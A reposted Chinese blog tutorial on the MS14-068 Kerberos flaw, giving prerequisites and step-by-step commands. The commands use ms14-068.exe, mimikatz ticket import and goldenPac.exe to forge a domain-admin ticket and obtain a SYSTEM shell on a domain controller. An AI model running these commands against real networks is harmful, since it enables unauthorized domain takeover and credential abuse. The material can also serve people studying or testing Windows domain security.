ms14-068漏洞

一、ms14-068漏洞介绍

ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。

二、ms14-068漏洞利用条件

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

三、ms14-068漏洞利用步骤

1、查看域用户的SID

whoami /all

2、清除内存中的票据

klist purge

3、通过ms14-068.exe生成票据

ms14-068.exe -u 域用户@域名 -p 域用户密码 -s 域用户SID -d 域控

4、导入票据到内存

kerberos::ptc 票据名字

5、测试是否成功(注意是机器名不是IP)

dir \dc.candada.comc$

6、可配合计划任务、服务或者PsExec工具上线

四、利用goldenPac.exe工具

它是MS14-068+psexec的组合,因此使用起来非常放方便快捷,一条命令可拿到system权限。

利用:

goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名

条件:

1、获取域普通用户的账号密码

2、获取域普通用户的sid

3、服务器未打KB3011780补丁

4、需要远程桌面(使用这个工具,运行了一条命令后,如果成功则会拿到一共反弹shell,CS没法用)

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/candada/p/17473739.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!